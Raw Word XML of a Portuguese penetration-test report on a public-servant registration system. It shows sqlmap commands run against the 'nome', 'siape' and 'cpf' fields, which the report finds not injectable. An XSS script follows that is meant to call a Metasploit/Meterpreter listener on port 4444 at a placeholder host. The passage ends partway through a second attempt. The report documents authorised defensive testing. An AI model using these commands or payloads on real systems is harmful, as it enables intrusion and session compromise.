          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: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 </w:t>
      </w:r>
      <w:r w:rsidR="00D76012" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Não foi possível descobrir dados de outros servidores cadastrados na base de dados através da instrução de consulta fornecida ao campo “</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Siape”</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Entretanto, devido à falta de tratamento adequado para dados inválidos no campo “</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Siape</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” o seguinte erro foi exibido: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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Erro:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Data too long for column ‘id’ at row 1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Dessa forma foi possível identificar que o campo </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“Siape”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, no banco de dados corresponde à coluna ‘id’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softHyphen/>
      </w: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 6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Usar a ferramenta Sqlmap para realizar a </w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sessão de teste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de injetar SQL na página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lastRenderedPageBreak/>
        <w:t>Primeiro, deve-se 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alvar a requisição POST capturada pela ferramenta Burp Suite em um arquivo a parte para utilizar no Sqlmap posteriormente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Comando utilizado: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sqlmap -r paramsTelaConsServidor -p nome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sqlmap -r paramsTelaConsServidor -p siape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sqlmap -r paramsTelaConsServidor -p cpf --dbms=msql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630433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comando “-r” informa que as instruções do ataque devem ser carregadas no arquivo p</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>aramsTelaConsServidor</w:t>
      </w:r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F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433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“-p” indica o parâmetro que deve ser injetado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433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“--current-db” comando utilizado para descobrir qual o banco da aplicação alvo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77F75" w:rsidRPr="00F15F82" w:rsidRDefault="00E77F7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D038A" w:rsidRPr="00F15F82" w:rsidRDefault="000D038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A8D3C47" wp14:editId="674E35D9">
            <wp:extent cx="5400040" cy="165671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27(Editada)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E4" w:rsidRPr="00F15F82" w:rsidRDefault="00777DD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Figura 26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– Dados da requisição via POST capturada pelo Burp Suite.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F06E4" w:rsidRPr="00F15F82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ab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F06E4" w:rsidRPr="00F15F82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0F06E4" w:rsidRPr="00F15F82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spera-se que o sistema realize o tratamento sobre os parâmetros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latório de execução</w:t>
      </w:r>
      <w:r w:rsidR="001E29F7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F8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76012"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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Os parâmetros “</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nome</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”, “</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>siape</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” e “</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cpf</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” não são injetáveis conform</w:t>
      </w:r>
      <w:r w:rsidR="00605CFE" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e mostram as figuras 27, 28 e 29</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77F75" w:rsidRPr="00F15F82" w:rsidRDefault="00E77F7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E74BFAA" wp14:editId="1FE9C3F0">
            <wp:extent cx="5400040" cy="411543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28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75" w:rsidRPr="00F15F82" w:rsidRDefault="00777DD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Figura 27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- Resultado </w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"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de Injeção SQL no campo </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nome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E77F75" w:rsidRPr="00F15F82" w:rsidRDefault="00E77F7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77F75" w:rsidRPr="00F15F82" w:rsidRDefault="00E77F7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660E863B" wp14:editId="5640808A">
            <wp:extent cx="5400040" cy="398653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9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F8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C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00777DD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lastRenderedPageBreak/>
        <w:t>Figura 28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- Resultado </w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"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de Injeção SQL no campo </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Siape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E77F7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      </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F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39018AF" wp14:editId="4A0FB04A">
            <wp:extent cx="5400040" cy="402844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30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9A2041" w:rsidP="00AC10DC">
      <w:pPr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Fi</w:t>
      </w:r>
      <w:r w:rsidR="00777DDF" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gura 29</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -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Resultado </w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"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de Injeção SQL no campo </w:t>
      </w:r>
      <w:r w:rsidR="00E77F75" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CPF.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="0063043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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Iteração 5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC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5.1 Explorar XSS – Tela Cadastro Servidor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Tarefa realizada dia </w:t>
      </w:r>
      <w:r w:rsidR="00E52417" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>19/05/16</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82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: 1 hora.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00751591" w:rsidRPr="00F15F82" w:rsidRDefault="00751591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Objetivo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC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Utilizar o campo de “</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nome</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” para tentar incluir um script malicioso que consiga burlar o filtro CORS e realizar uma chamada a um listener do Mestasploit para executar um ataque usando Meterpreter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="0048383A" w:rsidP="00AC10DC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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00E5241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Para burlar o filtro CORS, do navegador é necessário que sejam incluídas algumas credenciais no cabeçalho da requisição. O script abaixo simula uma </w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sessão de teste</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> de requisição credenciada por meio do atributo “</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>withCredencials”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>É esperado que a aplicação impeça a conexão.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52417" w:rsidRPr="00F15F82" w:rsidRDefault="00E5241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81DA5" w:rsidRPr="00F15F82" w:rsidRDefault="00881DA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lastRenderedPageBreak/>
        <w:t>O código abaixo cria um objeto do tipo XMLHttpRequest e inicia uma chamada Ajax  dotipo GET para IP_do_servidor na porta 4444 de forma assíncrona. Porém, aqui é utilizado o atributo “</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">withCredencials” </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>para burlar o filtro de CORS do navegador.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00881DA5" w:rsidRPr="00F15F82" w:rsidRDefault="00881DA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C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:spacing w:after="22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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="00008B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:spacing w:after="22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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">r = </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="00008B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XMLHttpRequest</w:t>
      </w:r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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:spacing w:after="22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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>r.open(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4A1C21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"GET"</w:t>
      </w:r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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,’</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1155CC"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://IP_do_servidor:4444’,false</w:t>
      </w:r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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:spacing w:after="22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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>r.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E1E7FF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>withCredentials</w:t>
      </w:r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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = true;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:spacing w:after="22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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="6A737C"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.send();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F06E4" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="00008B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="6A737C"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="008719F1" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="00008B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F06E4" w:rsidRPr="00F15F82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0F06E4" w:rsidRPr="00F15F82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spera-se que a conexão não seja aberta.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F06E4" w:rsidRPr="00F15F82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onsolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="00008B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="00008B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82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  <w:r w:rsidR="001E29F7" w:rsidRPr="00F15F82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8719F1" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D76012" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>O sistema passou nos testes</w:t>
      </w:r>
      <w:r w:rsidR="008719F1" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. O comando </w:t>
      </w:r>
      <w:r w:rsidR="008719F1" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">“withCredentials” </w:t>
      </w:r>
      <w:r w:rsidR="008719F1" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> encontra-se depreciado e a conexão não ocorreu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77F75" w:rsidRPr="00F15F82" w:rsidRDefault="00E77F7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77F75" w:rsidRPr="00F15F82" w:rsidRDefault="00E77F75" w:rsidP="00AC10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7CAE520" wp14:editId="4DC4DDE2">
            <wp:extent cx="5400040" cy="64960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777DDF" w:rsidP="00AC10DC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Figura 30</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="008719F1" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Console do navegador indicando a </w:t>
      </w:r>
      <w:r w:rsidR="00751591" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>depreciação</w:t>
      </w:r>
      <w:r w:rsidR="008719F1" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> do atributo </w:t>
      </w:r>
      <w:r w:rsidR="008719F1" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“withCredencials”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00751591" w:rsidRPr="00F15F82" w:rsidRDefault="00751591" w:rsidP="00AC10DC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C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="0048383A" w:rsidP="00AC10DC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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008719F1" w:rsidP="00AC10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Para burlar o filtro CORS, deve ser adicionado ao cabeçalho da requisição uma instrução que simule uma assinatura válida para o navegador. Para esse fim, foi utilizado a instrução “</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">setRequestHeader” </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>para adicionar as credenciais maliciosas ao cabeçalho.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00881DA5" w:rsidP="00AC10D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código abaixo cria um objeto do tipo XMLHttpRequest e inicia uma chamada Ajax  dotipo GET para IP_do_servidor na porta 4444 de forma assíncrona.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
